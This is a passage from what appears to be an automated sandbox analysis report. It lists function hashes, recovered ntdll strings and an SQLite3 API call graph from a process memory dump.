                                                                                              • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                              • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                              • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                              • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                              • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                              • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                              • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                              • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                                                              • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                                                              • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                                                              • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                              • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                                                              • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                              • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                                                              • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                                                              • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                                                              • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd

                                                                                              APIs
                                                                                              Strings
                                                                                              • WindowsExcludedProcs, xrefs: 00EC87C1
                                                                                              • Kernel-MUI-Language-Allowed, xrefs: 00EC8827
                                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 00EC8914
                                                                                              • Kernel-MUI-Language-SKU, xrefs: 00EC89FC
                                                                                              • Kernel-MUI-Number-Allowed, xrefs: 00EC87E6
                                                                                              Similarity
                                                                                              • API ID: _wcspbrk
                                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                              • API String ID: 402402107-258546922
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _wcsnlen
                                                                                              • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                                              • API String ID: 3628947076-1387797911
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00EF3F12
                                                                                              Strings
                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00EF3F75
                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 00EFE345
                                                                                              • 'u, xrefs: 00ED7F1E
                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00EF3EC4
                                                                                              • ExecuteOptions, xrefs: 00EF3F04
                                                                                              • Execute=1, xrefs: 00EF3F5E
                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00EF3F4A
                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00EFE2FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: BaseDataModuleQuery
                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$'u
                                                                                              • API String ID: 3901378454-3930412660
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fassign
                                                                                              • String ID: .$:$:
                                                                                              • API String ID: 3965848254-2308638275
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F02206
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 885266447-4236105082
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___swprintf_l.LIBCMT ref: 00F0EA22
                                                                                                • Part of subcall function 00EE13CB: ___swprintf_l.LIBCMT ref: 00EE146B
                                                                                                • Part of subcall function 00EE13CB: ___swprintf_l.LIBCMT ref: 00EE1490
                                                                                              • ___swprintf_l.LIBCMT ref: 00EE156D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$]:%u
                                                                                              • API String ID: 48624451-3050659472
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$]:%u
                                                                                              • API String ID: 48624451-3050659472
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F022F4
                                                                                              Strings
                                                                                              • RTL: Re-Waiting, xrefs: 00F02328
                                                                                              • RTL: Resource at %p, xrefs: 00F0230B
                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00F022FC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 885266447-871070163
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • RTL: Re-Waiting, xrefs: 00F024FA
                                                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00F0248D
                                                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00F024BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                              • API String ID: 0-3177188983
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fassign
                                                                                              • String ID:
                                                                                              • API String ID: 3965848254-0
                                                                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                              • Instruction ID: f0daf8a5adbfca2eb21ddf70d7c06355643de99056b1df51519584f1c95993d1
                                                                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                              • Instruction Fuzzy Hash: FF919F31D0024AEBDF24DF58C8457EEB7B5EF55318F24947BD802B62A2E7305A42EB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm
                                                                                              • String ID: $$0
                                                                                              • API String ID: 1302938615-389342756
                                                                                              • Opcode ID: 7a766501e705e82950514fab4fa473020608baf63e430a4bd578bc89df809847
                                                                                              • Instruction ID: 33a009e3e1c745f2787fac2674d4e34a1d69df51bde5f1a09af90fadf32113d2
                                                                                              • Opcode Fuzzy Hash: 7a766501e705e82950514fab4fa473020608baf63e430a4bd578bc89df809847
                                                                                              • Instruction Fuzzy Hash: 3391D531D08B8ADFDF24CF99C4653EDBBB0AF01B22F14455ADEA1A7291C3744A49EB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              • ], xrefs: 00F1E75B
                                                                                              • Set 0x%X protection for %p section for %d bytes, old protection 0x%X, xrefs: 00F1E893
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcstoul
                                                                                              • String ID: Set 0x%X protection for %p section for %d bytes, old protection 0x%X$]
                                                                                              • API String ID: 1097018459-2671679092
                                                                                              • Opcode ID: af0728b4bcad36766d6cc3fb32c9557d091754e9759d3477101ce9383d23addb
                                                                                              • Instruction ID: cda36d297fa7f927ec1afafe2f9aaaaf9806b156acadc8b412359c36bd259903
                                                                                              • Opcode Fuzzy Hash: af0728b4bcad36766d6cc3fb32c9557d091754e9759d3477101ce9383d23addb
                                                                                              • Instruction Fuzzy Hash: 0A418072D00249AADF119FE4C885BEEB7F9AF09320F14846AF911A7181E774DAC4E760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              • 1, xrefs: 00EDC56F
                                                                                              • {%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 00EDC5BB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: 1${%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
                                                                                              • API String ID: 48624451-1603231898
                                                                                              • Opcode ID: 9b31a080ecbab45973959af9b9c3bcc7c6c69c9e0091f53cd358d4f3af5736a1
                                                                                              • Instruction ID: 1ca09e5faf87b90333ac96e812ef904af05b7408fdc594a189665b2c81b92449
                                                                                              • Opcode Fuzzy Hash: 9b31a080ecbab45973959af9b9c3bcc7c6c69c9e0091f53cd358d4f3af5736a1
                                                                                              • Instruction Fuzzy Hash: 430165560085B065D32147A74811872FBF99FCEA15728C48EF6D849296E17BD542E770
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcstoul.LIBCMT ref: 00F1E901
                                                                                                • Part of subcall function 00F55AA6: __cftof.LIBCMT ref: 00F55AB6
                                                                                              Strings
                                                                                              • ], xrefs: 00F1E8E3
                                                                                              • CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X, xrefs: 00F1E91B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: __cftof_wcstoul
                                                                                              • String ID: CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X$]
                                                                                              • API String ID: 1831096779-2103298067
                                                                                              • Opcode ID: f6427961911500027d9936099a07af868612d0607be5df9ad5f86dc0d0ca67e9
                                                                                              • Instruction ID: 5635bb24951274f295da3d916724f167d5b14ff73c36035396771ed5e0595378
                                                                                              • Opcode Fuzzy Hash: f6427961911500027d9936099a07af868612d0607be5df9ad5f86dc0d0ca67e9
                                                                                              • Instruction Fuzzy Hash: 30F0F6375402047AEB102A65DC03EDB77EDDF95B20F044119FE14AA191F9B5EA40D760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:1.8%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:0.4%
                                                                                              Total number of Nodes:463
                                                                                              Total number of Limit Nodes:65
11 API calls 27176 61e29848 27175->27176 27178 61e2987d 27176->27178 27180 61e102ca sqlite3_free 27176->27180 27292 61e292d9 12 API calls 27177->27292 27178->27064 27180->27178 27181->27175 27183 61e12c52 27182->27183 27184 61e12bd7 27182->27184 27183->27075 27183->27076 27184->27183 27293 61e12a25 10 API calls 27184->27293 27186 61e12c3c 27186->27183 27294 61e0fc12 sqlite3_free 27186->27294 27189 61e48a32 strcmp 27188->27189 27190 61e48a5c 27188->27190 27189->27190 27224 61e48d78 27189->27224 27191 61e12df3 6 API calls 27190->27191 27190->27224 27202 61e48abc 27191->27202 27192 61e12df3 6 API calls 27193 61e48f45 27192->27193 27195 61e48f5d 27193->27195 27196 61e48f4b 27193->27196 27194 61e496c8 27194->27086 27194->27087 27199 61e49064 27195->27199 27300 61e0fc12 sqlite3_free 27195->27300 27299 61e0fc12 sqlite3_free 27196->27299 27197 61e48cfc 27200 61e12df3 6 API calls 27197->27200 27201 61e4912d 27199->27201 27206 61e01617 48 API calls 27199->27206 27210 61e48d14 27200->27210 27301 61e14925 15 API calls 27201->27301 27202->27194 27202->27197 27209 61e10f19 6 API calls 27202->27209 27204 61e4955e 27207 61e49563 sqlite3_free sqlite3_free 27204->27207 27216 61e490b9 27206->27216 27246 61e4951a 27207->27246 27208 61e48f58 27208->27207 27304 61e4891e 91 API calls 27208->27304 27212 61e48b4f 27209->27212 27210->27204 27221 61e10f19 6 API calls 27210->27221 27210->27224 27214 61e48b65 sqlite3_free 27212->27214 27215 61e48b77 27212->27215 27213 61e495be sqlite3_mutex_leave 27213->27194 27214->27194 27218 61e48b80 27215->27218 27225 61e48bb1 sqlite3_free sqlite3_free 27215->27225 27217 61e49190 27216->27217 27219 61e49104 sqlite3_uri_boolean 27216->27219 27232 61e48eb8 27217->27232 27302 61e0ace3 sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 27217->27302 27226 61e48be2 sqlite3_mutex_enter 27218->27226 27219->27201 27223 61e49133 sqlite3_uri_boolean 27219->27223 27236 61e48de0 27221->27236 27222 61e49231 sqlite3_free 
27222->27232 27223->27201 27224->27192 27224->27208 27225->27194 27295 61e01713 27226->27295 27229 61e48c09 27230 61e48c1c strcmp 27229->27230 27231 61e48cdf sqlite3_mutex_leave sqlite3_free 27229->27231 27238 61e48c4c 27229->27238 27230->27229 27231->27197 27247 61e49474 27231->27247 27232->27208 27233 61e014e3 17 API calls 27232->27233 27239 61e49353 27232->27239 27233->27239 27234 61e13faa 3 API calls 27234->27246 27235 61e48cbd 27235->27231 27236->27208 27236->27224 27237 61e48eab 27236->27237 27297 61e24025 sqlite3_log 27236->27297 27298 61e0fc12 sqlite3_free 27237->27298 27238->27235 27241 61e48c81 sqlite3_mutex_leave sqlite3_mutex_leave sqlite3_free sqlite3_free 27238->27241 27239->27208 27248 61e49627 27239->27248 27303 61e14925 15 API calls 27239->27303 27241->27194 27244 61e49439 27244->27208 27244->27247 27244->27248 27245 61e48e99 27245->27224 27245->27237 27246->27194 27246->27213 27247->27234 27248->27208 27249 61e4966a sqlite3_mutex_enter sqlite3_mutex_leave 27248->27249 27249->27248 27251 61e166d9 27250->27251 27252 61e166e5 27250->27252 27253 61e13faa 3 API calls 27251->27253 27252->27093 27253->27252 27256 61e102a0 27254->27256 27255 61e102e0 sqlite3_overload_function 27255->27098 27255->27099 27256->27254 27256->27255 27305 61e10259 sqlite3_free 27256->27305 27259 61e14558 27258->27259 27260 61e14597 sqlite3_free 27259->27260 27261 61e145d5 27259->27261 27262 61e145a5 27259->27262 27260->27262 27261->27123 27262->27261 27263 61e10f19 6 API calls 27262->27263 27263->27261 27264->27079 27265->27079 27266->27085 27267->27111 27268->27157 27269->27134 27270->27128 27271->27141 27272->27148 27273->27163 27274->27131 27275->27119 27276->27165 27277->27143 27279 61e10f35 27278->27279 27280 61e11009 27278->27280 27279->27280 27281 61e10f50 sqlite3_mutex_enter 27279->27281 27280->27060 27284 61e10f66 27281->27284 27282 61e10fbd 27288 61e23fdb malloc 27282->27288 27283 61e10ff8 sqlite3_mutex_leave 27283->27280 27284->27282 27291 61e0a0e3 
sqlite3_mutex_leave sqlite3_mutex_enter 27284->27291 27286 61e10fd2 27286->27283 27289 61e24001 sqlite3_log 27288->27289 27290 61e23ff4 27288->27290 27289->27290 27290->27286 27291->27282 27292->27178 27293->27186 27294->27183 27296 61e0171c sqlite3_mutex_enter 27295->27296 27296->27229 27297->27245 27298->27232 27299->27208 27300->27199 27301->27217 27302->27222 27303->27244 27304->27204 27305->27256

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              APIs
                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E92640
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1913B
                                                                                                • Part of subcall function 61E19104: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E212EB), ref: 61E1916F
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19447
                                                                                              • sqlite3_free.SQLITE3 ref: 61E926C5
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E926DA
                                                                                                • Part of subcall function 61E3AAE5: memcmp.MSVCRT ref: 61E3AB33
                                                                                                • Part of subcall function 61E3AAE5: sqlite3_malloc64.SQLITE3 ref: 61E3AB67
                                                                                              • sqlite3_create_function.SQLITE3 ref: 61E93061
                                                                                              • sqlite3_create_function.SQLITE3 ref: 61E930AB
                                                                                              • sqlite3_create_function.SQLITE3 ref: 61E930F5
                                                                                              • sqlite3_create_function.SQLITE3 ref: 61E931A5
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E932E9
                                                                                              • sqlite3_free.SQLITE3 ref: 61E9290B
